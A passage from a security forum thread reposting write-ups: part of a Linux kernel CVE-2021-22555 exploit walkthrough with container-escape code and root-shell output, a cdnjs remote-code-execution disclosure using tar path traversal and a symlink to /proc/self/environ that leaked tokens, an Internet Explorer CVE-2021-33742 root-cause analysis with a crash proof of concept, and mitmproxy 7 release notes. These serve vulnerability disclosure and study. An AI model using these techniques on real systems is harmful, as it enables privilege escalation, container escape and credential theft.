alen = min(len, DATALEN_SEG); seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); if (seg == NULL) goto out_err; *pseg = seg; seg->next = NULL; pseg = &seg->next; len -= alen; } return msg; out_err: free_msg(msg); return NULL; } where the headers for struct msg_msg and struct msg_msgseg are: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/msg.h /* one msg_msg structure for each message */ struct msg_msg { struct list_head m_list; long m_type; size_t m_ts; /* message text size */ struct msg_msgseg *next; void *security; /* the actual message follows immediately */ }; // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/types.h struct list_head { struct list_head *next, *prev; }; // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c struct msg_msgseg { struct msg_msgseg *next; /* the next part of the message follows immediately */ }; The first member in struct msg_msg is the mlist.next pointer which is pointing to another message in the queue (which is different from next as this is a pointer to the next segment). This is a perfect candidate to corrupt as you will learn next. Achieving use-after-free First, we initialize a lot of message queues (in our case 4096) using msgget(). Then, we send one message of size 4096 (including the struct msg_msg header) for each of the message queues using msgsnd(), which we will call the primary message. Eventually, after a lot of messages, we have some that are consecutive: [Figure 1: A series of blocks of primary messages] Next, we send a secondary message of size 1024 for each of the message queues using msgsnd(): [Figure 2: A series of blocks of primary messages pointing to secondary messages] Finally, we create some holes (in our case every 1024th) in the primary messages, and trigger the vulnerable setsockopt(IPT_SO_SET_REPLACE) option, which, in the best scenario, will allocate the struct xt_table_info object in one of the holes: [Figure 3: A xt_table_info allocated in between the blocks which corrupts the next pointer] We choose to overwrite two bytes of the adjacent object with zeros. Assume we are adjacent to another primary message, these bytes we overwrite are part of the pointer to the secondary message. Since we allocate them with a size of 1024 bytes, we therefore have a 1 - (1024 / 65536) chance to redirect the pointer (the only case we fail is when the two least significant bytes of the pointer are already zero). Now, the best scenario we can hope for is that the manipulated pointer also points to a secondary message, since the consequence will be two different primary messages pointing to the same secondary message, and this can lead to a use-after-free: [Figure 4: Two primary messages pointing to the same secondary message due to the corrupted pointer] However, how do we know which two primary messages are pointing to the same secondary message? In order to answer this question, we tag every (primary and secondary) message with the index of the message queue which is in [0, 4096). Then, after triggering the corruption, we iterate through all message queues, peek at all messages using msgrcv() with MSG_COPY and see if they are the same. If the tag of the primary message is different from the secondary message, it means that it has been redirected. In which case the tag of the primary message represents the index of the fake message queue, i.e. the one containing the wrong secondary message, and the tag of the wrong secondary message represents the index of the real message queue. Knowing these two indices, achieving a use-after-free is now trivial - we namely fetch the secondary message from the real message queue using msgrcv() and as such free it: [Figure 5: Freed secondary message with a stale reference] Note that we still have a reference to the freed message in the fake message queue. Bypassing SMAP Using unix sockets (which can be easily set up with socketpair()), we now spray a lot of messages of size 1024 and imitate the struct msg_msg header. Ideally, we are able to reclaim the address of the previously freed message: [Figure 6: Fake struct msg_msg put in place of the freed secondary message] Note that mlist.next is 41414141 as we do not yet know any kernel addresses (when SMAP is enabled, we cannot specify a user address). Not having a kernel address is crucial as it actually prevents us from freeing the block again (you will learn later why that is desired). The reason is that during msgrcv(), the message is unlinked from the message queue that is a circular list. Luckily, we are actually in a good position to achieve an information leak, as there are some interesting fields in struct msg_msg. Namely, the field m_ts is used to determine how much data to return to userland: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst) { struct msg_msgseg *dst_pseg, *src_pseg; size_t len = src->m_ts; size_t alen; if (src->m_ts > dst->m_ts) return ERR_PTR(-EINVAL); alen = min(len, DATALEN_MSG); memcpy(dst + 1, src + 1, alen); ... return dst; } The original size of the message is only 1024-sizeof(struct msg_msg) bytes which we can now artificially increase to DATALEN_MSG=4096-sizeof(struct msg_msg). As a consequence, we will now be able to read past the intended message size and leak the struct msg_msg header of the adjacent message. As said before, the message queue is implemented as a circular list, thus, mlist.next points back to the primary message. Knowing the address of a primary message, we can re-craft the fake struct msg_msg with that address as next (meaning that it is the next segment). The content of the primary message can then be leaked by reading more than DATALEN_MSG bytes. The leaked mlist.next pointer from the primary message reveals the address of the secondary message that is adjacent to our fake struct msg_msg. Subtracting 1024 from that address, we finally have the address of the fake message. Achieving a better use-after-free Now, we can rebuild the fake struct msg_msg object with the leaked address as mlist.next and mlist.prev (meaning that it is pointing to itself), making the fake message free-able with the fake message queue. [Figure 7: Fake struct msg_msg with a valid next pointer pointing to itself] Note that when spraying using unix sockets, we actually have a struct sk_buff object which points to the fake message. Obviously, this means that when we free the fake message, we still have a stale reference: [Figure 8: Freed fake message with a stale reference] This stale struct sk_buff data buffer is a better use-after-free scenario to exploit, because it does not contain header information, meaning that we can now use it to free any kind of object on the slab. In comparison, freeing a struct msg_msg object is only possible if the first two members are writable pointers (needed to unlink the message). Finding a victim object The best victim to attack is one that has a function pointer in its structure. Remember that the victim must also be allocated with GFP_KERNEL_ACCOUNT. Talking to Jann Horn, he suggested the struct pipe_buffer object which is allocated in kmalloc-1024 (hence why the secondary message is 1024 bytes). The struct pipe_buffer can be easily allocated with pipe() that has alloc_pipe_info() as a subroutine: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c struct pipe_inode_info *alloc_pipe_info(void) { ... unsigned long pipe_bufs = PIPE_DEF_BUFFERS; ... pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT); if (pipe == NULL) goto out_free_uid; ... pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT); ... } While it does not contain a function pointer directly, it contains a pointer to struct pipe_buf_operations that on the other hand has function pointers: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; unsigned long private; }; struct pipe_buf_operations { ... /* * When the contents of this pipe buffer has been completely * consumed by a reader, ->release() is called. */ void (*release)(struct pipe_inode_info *, struct pipe_buffer *); ... }; Bypassing KASLR/SMEP When one writes to the pipes, struct pipe_buffer is populated. Most importantly, ops will point to the static structure anon_pipe_buf_ops which resides in the .data segment: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c static const struct pipe_buf_operations anon_pipe_buf_ops = { .release = anon_pipe_buf_release, .try_steal = anon_pipe_buf_try_steal, .get = generic_pipe_buf_get, }; Since the difference between the .data segment and the .text segment is always the same, having anon_pipe_buf_ops basically allows us to calculate the kernel base address. We spray a lot of struct pipe_buffer objects and reclaim the location of the stale struct sk_buff data buffer: [Figure 9: Freed fake message reclaimed with a struct pipe_buffer] As we still have a reference from the struct sk_buff, we can read its data buffer, leak the content of struct pipe_buffer and reveal the address of anon_pipe_buf_ops: [+] anon_pipe_buf_ops: ffffffffa1e78380 [+] kbase_addr: ffffffffa0e00000 With this information, we can now find JOP/ROP gadgets. Note that when reading from the unix socket, we actually free its buffer as well: [Figure 10: Freed fake message reclaimed with a struct pipe_buffer] Escalating privileges We reclaim the stale struct pipe_buffer with a fake one with ops pointing to a fake struct pipe_buf_operations. This fake structure is planted at the same location since we know its address, and obviously, this structure should contain a malicious function pointer as release. [Figure 11: Freed struct pipe_buffer reclaimed with a fake struct pipe_buffer] The final stage of the exploit is to close all pipes in order to trigger the release which in turn will kick off the JOP chain. Finding JOP gadgets is hard, thus the goal is to achieve a kernel stack pivot as soon as possible in order to execute a kernel ROP chain. Kernel ROP chain We save the value of RBP at some scratchpad address in kernel so that we can later resume the execution, then we call commit_creds(prepare_kernel_cred(NULL)) to install kernel credentials and finally we call switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) to switch the namespace of process 1 to the one of the init process. After that, we restore the value of RBP and return to resume the execution (which will immediately make free_pipe_info() return). Escaping the container and popping a root shell Arriving back in userland, we now have root permissions to change mnt, pid and net namespaces to escape the container and break out of the kubernetes pod. Ultimately, we pop a root shell. setns(open("/proc/1/ns/mnt", O_RDONLY), 0); setns(open("/proc/1/ns/pid", O_RDONLY), 0); setns(open("/proc/1/ns/net", O_RDONLY), 0); char *args[] = {"/bin/bash", "-i", NULL}; execve(args[0], args, NULL); Proof-Of-Concept The Proof-Of-Concept is available at https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555. Executing it on a vulnerable machine will grant you root: theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c theflow@theflow:~$ ./exploit [+] Linux Privilege Escalation by theflow@ - 2021 [+] STAGE 0: Initialization [*] Setting up namespace sandbox... [*] Initializing sockets and message queues... [+] STAGE 1: Memory corruption [*] Spraying primary messages... [*] Spraying secondary messages... [*] Creating holes in primary messages... [*] Triggering out-of-bounds write... [*] Searching for corrupted primary message... [+] fake_idx: ffc [+] real_idx: fc4 [+] STAGE 2: SMAP bypass [*] Freeing real secondary message... [*] Spraying fake secondary messages... [*] Leaking adjacent secondary message... [+] kheap_addr: ffff91a49cb7f000 [*] Freeing fake secondary messages... [*] Spraying fake secondary messages... [*] Leaking primary message... [+] kheap_addr: ffff91a49c7a0000 [+] STAGE 3: KASLR bypass [*] Freeing fake secondary messages... [*] Spraying fake secondary messages... [*] Freeing sk_buff data buffer... [*] Spraying pipe_buffer objects... [*] Leaking and freeing pipe_buffer object... [+] anon_pipe_buf_ops: ffffffffa1e78380 [+] kbase_addr: ffffffffa0e00000 [+] STAGE 4: Kernel code execution [*] Spraying fake pipe_buffer objects... [*] Releasing pipe_buffer objects... [*] Checking for root... [+] Root privileges gained. [+] STAGE 5: Post-exploitation [*] Escaping container... [*] Cleaning up... [*] Popping root shell... root@theflow:/# id uid=0(root) gid=0(root) groups=0(root) root@theflow:/# Timeline 2021-04-06 - Vulnerability reported to security@kernel.org. 2021-04-13 - Patch merged upstream. 2021-07-07 - Public disclosure. Thanks Eduardo Vela Francis Perron Jann Horn Sursa: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
      • 1
      • Upvote
  20. Remote code execution in cdnjs of Cloudflare 2021-07-16 1891 字 cdnjs Vulnerability Go Supply Chain RCE Preface (日本語版も公開されています。) Cloudflare, which runs cdnjs, is running a “Vulnerability Disclosure Program” on HackerOne, which allows hackers to perform vulnerability assessments. This article describes vulnerabilities reported through this program and published with the permission of the Cloudflare security team. So this article is not intended to recommend you to perform an unauthorized vulnerability assessment. If you found any vulnerabilities in Cloudflare’s product, please report it to Cloudflare’s vulnerability disclosure program. TL;DR There was a vulnerability in the cdnjs library update server that could execute arbitrary commands, and as a result, cdnjs could be completely compromised. This allows an attacker to tamper 12.7%1 of all websites on the internet once caches are expired. About cdnjs cdnjs is a JavaScript/CSS library CDN that is owned by Cloudflare, which is used by 12.7% of all websites on the internet as of 15 July 2021. This is the second most widely used library CDN after 12.8%2 of Google Hosted Libraries, and considering the current usage rate, it will be the most used JavaScript library CDN in the near future. Usage graph of cdnjs from W3Techs, as of 15 July 2021 Reason for investigation A few weeks before my last investigation into “Remote code execution in Homebrew by compromising the official Cask repository”, I was investigating supply chain attacks. While finding a service that many software depends on, and is allowing users to perform the vulnerability assessment, I found cdnjs. So I decided to investigate it. Initial investigation While browsing the cdnjs website, I found the following description. Couldn’t find the library you’re looking for? You can make a request to have it added on our GitHub repository. I found out that the library information is managed on the GitHub repository, so I checked the repositories of the GitHub Organization that is used by cdnjs. As a result, it was found that the repository is used in the following ways. cdnjs/packages: Stores library information that is supported in cdnjs cdnjs/cdnjs: Stores files of libraries cdnjs/logs: Stores update logs of libraries cdnjs/SRIs: Stores SRI (Subresource Integrity) of libraries cdnjs/static-website: Source code of cdnjs.com cdnjs/origin-worker: Cloudflare Worker for origin of cdnjs.cloudflare.com cdnjs/tools: cdnjs management tools cdnjs/bot-ansible: Ansible repository of the cdnjs library update server As you can see from these repositories, most of the cdnjs infrastructure is centralized in this GitHub Organization. I was interested in cdnjs/bot-ansible and cdnjs/tools because it automates library updates. After reading codes of these 2 repositories, it turned out cdnjs/bot-ansible executes autoupdate command of cdnjs/tools in the cdnjs library update server periodically, to check updates of library from cdnjs/packages by downloading npm package / Git repository. Investigation of automatic update The automatic update function updates the library by downloading the user-managed Git repository / npm package and copying the target file from them. And npm registry compress libraries into .tgz to make it downloadable. Since the tool for this automatic update is written in Go, I guessed that it may use Go’s compress/gzip and archive/tar to extract the archive file. Go’s archive/tar returns the filename contained in the archive without sanitizing3, so if the archive is extracted into the disk based on the filename returned from archive/tar, archives that contain filename like ../../../../../../../tmp/test may overwrite arbitrary files on the system. 4 From the information in cdnjs/bot-ansible, I knew that some scripts were running regularly and the user that runs the autoupdate command had write permission for them, so I focused on overwriting files via path traversal. Path traversal To find path traversal, I started reading the main function of the autoupdate command. func main() { [...] switch *pckg.Autoupdate.Source { case "npm": { util.Debugf(ctx, "running npm update") newVersionsToCommit, allVersions = updateNpm(ctx, pckg) } case "git": { util.Debugf(ctx, "running git update") newVersionsToCommit, allVersions = updateGit(ctx, pckg) } [...] } As you can see from the code snippet above, if npm is specified as a source of auto-update, it passes package information to the updateNpm function. func updateNpm(ctx context.Context, pckg *packages.Package) ([]newVersionToCommit, []version) { [...] newVersionsToCommit = doUpdateNpm(ctx, pckg, newNpmVersions) [...] } Then, updateNpm passes information about the new library version to doUpdateNpm function. func doUpdateNpm(ctx context.Context, pckg *packages.Package, versions []npm.Version) []newVersionToCommit { [...] for _, version := range versions { [...] tarballDir := npm.DownloadTar(ctx, version.Tarball) filesToCopy := pckg.NpmFilesFrom(tarballDir) [...] } And doUpdateNpm passes the URL of .tgz file into npm.DownloadTar. func DownloadTar(ctx context.Context, url string) string { dest, err := ioutil.TempDir("", "npmtarball") util.Check(err) util.Debugf(ctx, "download %s in %s", url, dest) resp, err := http.Get(url) util.Check(err) defer resp.Body.Close() util.Check(Untar(dest, resp.Body)) return dest } Finally, pass the .tgz file obtained using http.Get to the Untar function. func Untar(dst string, r io.Reader) error { gzr, err := gzip.NewReader(r) if err != nil { return err } defer gzr.Close() tr := tar.NewReader(gzr) for { header, err := tr.Next() [...] // the target location where the dir/file should be created target := filepath.Join(dst, removePackageDir(header.Name)) [...] // check the file type switch header.Typeflag { [...] // if it's a file create it case tar.TypeReg: { [...] f, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode)) [...] // copy over contents if _, err := io.Copy(f, tr); err != nil { return err } } } } } As I guessed, compress/gzip and archive/tar were used in Untar function to extract .tgz file. At first, I thought that it’s sanitizing the path in the removePackageDir function, but when I checked the contents of the function, I noticed that it’s just removing package/ from the path. From these code snippets, I confirmed that arbitrary code can be executed after performing path traversal from the .tgz file published to npm and overwriting the script that is executed regularly on the server. Demonstration of vulnerability Because Cloudflare is running a vulnerability disclosure program on HackerOne, it’s likely that HackerOne’s triage team won’t forward the report to Cloudflare unless it indicates that the vulnerability is actually exploitable. Therefore, I decided to do a demonstration to show that vulnerability can actually be exploited. The attack procedure is as follows. Publish the .tgz file that contains the crafted filename to the npm registry. Wait for the cdnjs library update server to process the crafted .tgz file. The contents of the file that is published in step 1 are written into a regularly executed script file and arbitrary command is executed. … and after writing the attack procedure into my notepad, for some reason, I started wondering how automatic updates based on the Git repository works. So, I read codes a bit before demonstrating the vulnerability, and it seemed that the symlinks aren’t considered when copying files from the Git repository. func MoveFile(sourcePath, destPath string) error { inputFile, err := os.Open(sourcePath) if err != nil { return fmt.Errorf("Couldn't open source file: %s", err) } outputFile, err := os.Create(destPath) if err != nil { inputFile.Close() return fmt.Errorf("Couldn't open dest file: %s", err) } defer outputFile.Close() _, err = io.Copy(outputFile, inputFile) inputFile.Close() if err != nil { return fmt.Errorf("Writing to output file failed: %s", err) } // The copy was successful, so now delete the original file err = os.Remove(sourcePath) if err != nil { return fmt.Errorf("Failed removing original file: %s", err) } return nil } As Git supports symbolic links by default, it may be possible to read arbitrary files from the cdnjs library update server by adding symlink into the Git repository. If the regularly executed script file is overwritten to execute arbitrary commands, the automatic update function may be broken, so I decided to check the arbitrary file reading first. Along with this, the attack procedure was changed as follows. Add a symbolic link that points harmless file (Assumed /proc/self/maps here) into the Git repository. Publish a new version in the repository. Wait for the cdnjs library update server to process the crafted repository. The specified file is published on cdnjs. It was around 20:00 at this point, but what I have to do was creating a symlink, so I decided to eat dinner after creating the symbolic link and publishing it.5 ln -s /proc/self/maps test.js Incident Once I finished the dinner and returning to my PC desk, I was able to confirm that cdnjs has released a version containing symbolic links. After checking the contents of the file to send the report, I was surprised. Surprisingly, clearly sensitive information such as GITHUB_REPO_API_KEY and WORKERS_KV_API_TOKEN was displayed. I couldn’t understand what happened for a moment, and when I checked the command log, I found that I accidentally put a link to /proc/self/environ instead of /proc/self/maps.6 As mentioned earlier, if cdnjs' GitHub Organization is compromised, it’s possible to compromise most of the cdnjs infrastructure. I needed to take immediate action, so I sent the report that only contains a link that shows the current situation, and requested them to revoke all credentials. At this point, I was very confused and hadn’t confirmed it, but in fact, these tokens were invalidated before I sent the report. It seems that GitHub notified Cloudflare immediately because GITHUB_REPO_API_KEY (API key of GitHub) was included in the repository, and Cloudflare started incident response immediately after the notification. I felt that they’re a great security team because they invalidated all credentials within minutes after cdnjs processed the specially crafted repository. Determinate impact After the incident, I investigated what could be impacted. GITHUB_REPO_API_KEY was an API key for robocdnjs, which belongs to cdnjs organization, and had write permission against each repository. This means it was possible to tamper arbitrary libraries on the cdnjs or tamper the cdnjs.com itself. Also, WORKERS_KV_API_TOKEN had permission against KV of Cloudflare Workers that is used in the cdnjs, it could be used to tamper the libraries on the KV cache. By combining these permissions, the core part of cdnjs, such as the origin data of cdnjs, the KV cache, and even the cdnjs website, could be completely tampered. Conclusion In this article, I described the vulnerability that was existed in cdnjs. While this vulnerability could be exploited without any special skills, it could impact many websites. Given that there are many vulnerabilities in the supply chain, which are easy to exploit but have a large impact, I feel that it’s very scary. If you have any questions/comments about this article, please send a message to @ryotkak on Twitter. Timeline Date (JST) Event April 6, 2021 19:00 Found a vulnerability April 6, 2021 20:00 Published a crafted symlink April 6, 2021 20:30 cdnjs processed the file At the same time GitHub sent an alert to Cloudflare At the same time Cloudflare started an incident response Within minutes Cloudflare finished revocation of credentials April 6, 2021 20:40 I sent an initial report April 6, 2021 21:00 I sent detailed report April 7, 2021- Secondary fix has applied June 3, 2021 Complete fix has applied July 16, 2021 Published this article Quoted from W3Techs as of 15 July 2021. Due to the presence of SRI / cache, fewer websites could tamper immediately. ↩︎ Quoted from W3Techs as of 15 July 2021. ↩︎ https://github.com/golang/go/issues/25849 ↩︎ Archives like this can be created by using tools such as evilarc. ↩︎ I don’t know if this is correct, but I remember that the dinner on that day was frozen gyoza (dumplings). (It was yummy!) ↩︎ Because I was tired from work and I was hungry, I ran the command completed by shell without any confirmation. ↩︎ Sursa: https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/
  21. CVE-2021-33742: Internet Explorer out-of-bounds write in MSHTML Maddie Stone, Google Project Zero & Threat Analysis Group The Basics Disclosure or Patch Date: 03 June 2021 Product: Microsoft Internet Explorer Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33742 Affected Versions: For Windows 10 20H2 x64, KB5003173 and previous First Patched Version: For Windows 10 20H2 x64, KB5003637 Issue/Bug Report: N/A Patch CL: N/A Bug-Introducing CL: N/A Reporter(s): Clément Lecigne of Google’s Threat Analysis Group The Code Proof-of-concept: Proof-of-concept by Ivan Fratric of Project Zero <script> var b = document.createElement("html"); b.innerHTML = Array(40370176).toString(); b.innerHTML = ""; </script> Exploit sample: Examples of the Word documents used to distribute this exploit: 656d19186795280a068fcb97e7ef821b55ad3d620771d42ed98d22ee3c635e67 851bf4ab807fc9b29c9f6468c8c89a82b8f94e40474c6669f105bce91f278fdb Did you have access to the exploit sample when doing the analysis? Yes The Vulnerability Bug class: Out-of-bounds write Vulnerability details: The vulnerability is due to the size of the string of the inner html element being truncated (size&0x1FFFFFF) in the CTreePos structure while the non-truncated size is still in the text data object. Memory at [1] is allocated based on the size in the CTreePos structure, the truncated size. The text data returned by MSHTML!Tree::TextData::GetText [2] includes the full non-truncated length of the string. The non-truncated length is then passed as the src length to wmemcpy_s [3] while the allocated destination memory uses the truncated length. While wmemcpy_s protects against the buffer overflow here, the source size is used as the increment even though that was not the number of bytes actually copied: the size of the allocation was. The index (v190) is incremented by the larger number. When that index is then used to access the memory allocated at [1], it leads to the out of bounds write at MSHTML!CSpliceTreeEngine::RemoveSplice+0xb1f. if ( v172 >= 90000 && ((_BYTE)v4[21] & 4) != 0 ) { v70 = 1 - CTreePos::GetCp(v4[5]); v71 = CTreePos::GetCp(v4[6]); /*** v71 = Truncated size (orig_sz&0x1ffffff) ***/ v72 = v4[6]; v104 = (*(_BYTE *)v72 & 4) == 0; v189 = (CTreeNode *)(v70 + v71); if ( !v104 ) { v73 = CTreeDataPos::GetTextLength(v72); v189 = (CTreeNode *)(v73 + v74 - 1); } if ( v184 <= (int)v187 ) { v77 = (struct CMarkup *)operator new[]( /*** [1] allocates based on truncated size ***/ (unsigned int)newAlloc, (const struct MemoryProtection::leaf_t *)newAllocSz); v4[23] = v77; if ( v77 ) { for ( i = v4[5]; i != *((struct CMarkup **)v4[6] + 5); i = (struct CMarkup *)*((_DWORD *)i + 5) ) { if ( (*(_BYTE *)i & 4) != 0 ) { /*** [2] srcTextSz is non truncated size ***/ srcText = Tree::TextData::GetText(*((Tree::TextData **)i + 8), 0, &srcTextSz); /*** [3] -- srcTextSz > newAllocSz ***/ wmemcpy_s(srcText, srcTextSz, (const wchar_t *)newAlloc, (rsize_t)newAllocSz); /*** memcpy only copied newAllocSz not srcTextSz so v190 is now > max ***/ v190 += srcTextSz; } else if ( (*(_BYTE *)i & 3) != 0 && (*(_BYTE *)i & 0x40) != 0 ) { v80 = v190; *((_WORD *)v4[23] + (_DWORD)v190) = 0xFDEF; v190 = v80 + 1; } } } Patch analysis: The patch is in Tree::TreeWriter::NewTextPosInternal. The patch will cause a release assert if there is an attempt to add TextData greater than 0x1FFFFFFF to the HTML tree. Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.): This vulnerability was likely found via fuzzing. A fuzzer may not have found this vulnerability if your fuzzer runs with a tight timeout since this vulnerability takes a few seconds to trigger. It still seems more likely that this would have been found via fuzzing rather than manual review. (Historical/present/future) context of bug: See this Google TAG blogpost for more info. Malicious Office documents loaded web content within Internet Explorer. The malicious document would fingerprint the device and then send this Internet Explorer website to users. The Exploit (The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.) Exploit strategy (or strategies): Still under analysis. Exploit flow: Known cases of the same exploit flow: Part of an exploit chain? This vulnerability was likely paired with a sandbox escape, but that was not collected. The Next Steps Variant analysis Areas/approach for variant analysis (and why): It seems possible that there would be more of these types of instances throughout the code base if CTreePos structures are truncating the sizes to 25 bits while other areas, such as TextData are not. The top 7 bits of the size in the CTreePos struct are used as flags. Found variants: N/A Structural improvements What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.? Ideas to kill the bug class: If truncating the size/length of an object, do the bounds checking/input validation of the size at the earliest point and only store the truncated size. Kill the tab process when the size reaches the size that can no longer be properly represented. Ideas to mitigate the exploit flow: N/A Other potential improvements: Microsoft has announced that Internet Explorer will be retired in June 2020. However, it also says that the retirement does not affect the MSHTML (Trident) engine. This means that mshtml.dll where this vulnerability exists is not planning to be retired. In the future, if a user enables IE mode in Edge, the mshtml engine would be used. It seems likely that Office will still have access to mshtml. Limiting access to mshtml and audit applications that use mshtml. 0-day detection methods What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day? Variants of this bug could potentially be detected by looking for javascript that tries to create objects with sizes greater than the allowed bounds. Other References July 2021: "How We Protect Users From 0-Day Attacks" by Google's Threat Analysis Group gives context about how this exploit was used. Sursa: https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html
  22. Mitmproxy 7 16 Jul 2021, Maximilian Hils @maximilianhils We’re delighted to announce the release of mitmproxy 7, a free and open source interactive HTTPS proxy. This release is all about our new proxy core, which bring substantial improvements across the board and represents a massive milestone for the project. What’s in the release? In this post we’ll focus on some of the user-facing improvements coming with mitmproxy 7. If you are interested in the technical details of our new sans-io proxy core, check out our blog post dedicated to that! Full TCP Support Mitmproxy now supports proxying raw TCP connections out of the box, including ones that start with a server-side greeting – for example SMTP. Opportunistic TLS (STARTTLS) is not supported yet, but regular TCP-over-TLS just works! HTTP/1 ⇔ HTTP/2 Interoperability Mitmproxy can now accept HTTP/2 requests from the client and forward them to an HTTP/1 server. This on-the-wire protocol translation works bi-directional: All HTTP requests and responses were created equal!. This change also makes it possible to change the request destination for HTTP/2 flows, which previously was not possible at all. WebSocket Message Display Mitmproxy now displays WebSocket messages not only in the event log, but also in a dedicated UI tab! There are still UX details to be ironed out, but we’re excited to ship a first prototype here. While this is only for the console UI via mitmproxy, the web UI via mitmweb is still looking for amazing contributors to get feature parity! Secure Web Proxy (TLS-over-TLS) Clients usually talk in plaintext to HTTP proxies – telling them where to connect – before they ultimately establish a secure TLS connection through the proxy with the destination server. With mitmproxy 7, clients can now establish TLS with the proxy right from the start (before issuing an HTTP CONNECT request), which can add a significant layer of defense in public networks. So instead of simply specifying http://127.0.0.1:8080 you can now also use HTTPS via https://127.0.0.1:8080 (or any other listen host and port). Windows Support for Console UI Thanks to an experimental urwid patch, mitmproxy’s console UI is now natively available on Windows. While the Window Subsystem for Linux (WSL) has been a viable alternative for a while, we’re very happy to provide the same tools across all platforms now. API Reference Documentation Having recently adopted the pdoc project, which generates awesome Python API documentation, we have built a completely new API reference documentation for mitmproxy’s addon API. Paired with our existing examples on GitHub, this makes it much simpler to write mitmproxy new addons. What’s next? While this release focuses heavily on our backend, the next mitmproxy release will come with lots of mitmweb improvements by our current GSoC 2021 student @gorogoroumaru. Stay tuned! Release Changelog Since the release of mitmproxy 6 about seven months ago, the project has had 527 commits by 28 contributors, resulting in 234 closed issues and 173 closed pull requests. New Proxy Core (@mhils) Secure Web Proxy: Mitmproxy now supports TLS-over-TLS to already encrypt the connection to the proxy. Server-Side Greetings: Mitmproxy now supports proxying raw TCP connections, including ones that start with a server-side greeting (e.g. SMTP). HTTP/1 – HTTP/2 Interoperability: mitmproxy can now accept an HTTP/2 connection from the client, and forward it to an HTTP/1 server. HTTP/2 Redirects: The request destination can now be changed on HTTP/2 flows. Connection Strategy: Users can now specify if they want mitmproxy to eagerly connect upstream or wait as long as possible. Eager connections are required to detect protocols with server-side greetings, lazy connections enable the replay of responses without connecting to an upstream server. Timeout Handling: Mitmproxy will now clean up idle connections and also abort requests if the client disconnects in the meantime. Host Header-based Proxying: If the request destination is unknown, mitmproxy now falls back to proxying based on the Host header. This means that requests can often be redirected to mitmproxy using DNS spoofing only. Internals: All protocol logic is now separated from I/O (“sans-io”). This greatly improves testing capabilities, prevents a wide array of race conditions, and increases proper isolation between layers. Additional Changes mitmproxy’s command line interface now supports Windows (@mhils) The clientconnect, clientdisconnect, serverconnect, serverdisconnect, and log events have been replaced with new events, see addon documentation for details (@mhils) Contentviews now implement render_priority instead of should_render, allowing more specialization (@mhils) Addition of block_list option to block requests with a set status code (@ericbeland) Make mitmweb columns configurable and customizable (@gorogoroumaru) Automatic JSON view mode when +json suffix in content type (@kam800) Use pyca/cryptography to generate certificates, not pyOpenSSL (@mhils) Remove the legacy protocol stack (@Kriechi) Remove all deprecated pathod and pathoc tools and modules (@Kriechi) In reverse proxy mode, mitmproxy now does not assume TLS if no scheme is given but a custom port is provided (@mhils) Remove the following options: http2_priority, relax_http_form_validation, upstream_bind_address, spoof_source_address, and stream_websockets. If you depended on one of them please let us know. mitmproxy never phones home, which means we don’t know how prominently these options were used. (@mhils) Fix IDNA host ‘Bad HTTP request line’ error (@grahamrobbins) Pressing ? now exits console help view (@abitrolly) --modify-headers now works correctly when modifying a header that is also part of the filter expression (@Prinzhorn) Fix SNI-related reproducibility issues when exporting to curl/httpie commands. (@dkasak) Add option export_preserve_original_ip to force exported command to connect to IP from original request. Only supports curl at the moment. (@dkasak) Major proxy protocol testing (@r00t-) Switch Docker image release to be based on Debian (@PeterDaveHello) Multiple Browsers: The browser.start command may be executed more than once to start additional browser sessions. (@rbdixon) Improve readability of SHA256 fingerprint. (@wrekone) Metadata and Replay Flow Filters: Flows may be filtered based on metadata and replay status. (@rbdixon) Flow control: don’t read connection data faster than it can be forwarded. (@hazcod) Docker images for ARM64 architecture (@hazcod, @mhils) Fix parsing of certificate issuer/subject with escaped special characters (@Prinzhorn) Customize markers with emoji, and filters: The flow.mark command may be used to mark a flow with either the default “red ball” marker, a single character, or an emoji like 🍇. Use the ~marker filter to filter on marker characters. (@rbdixon) New flow.comment command to add a comment to the flow. Add ~comment <regex> filter syntax to search flow comments. (@rbdixon) Fix multipart forms losing boundary values on edit. (@roytu) Transfer-Encoding: chunked HTTP message bodies are now retained if they are below the stream_large_bodies limit. (@mhils) json() method for HTTP Request and Response instances will return decoded JSON body. (@rbdixon) Support for HTTP/2 Push Promises has been dropped. (@mhils) Make it possible to set sequence options from the command line. (@Yopi) Sursa: https://mitmproxy.org/posts/releases/mitmproxy7/
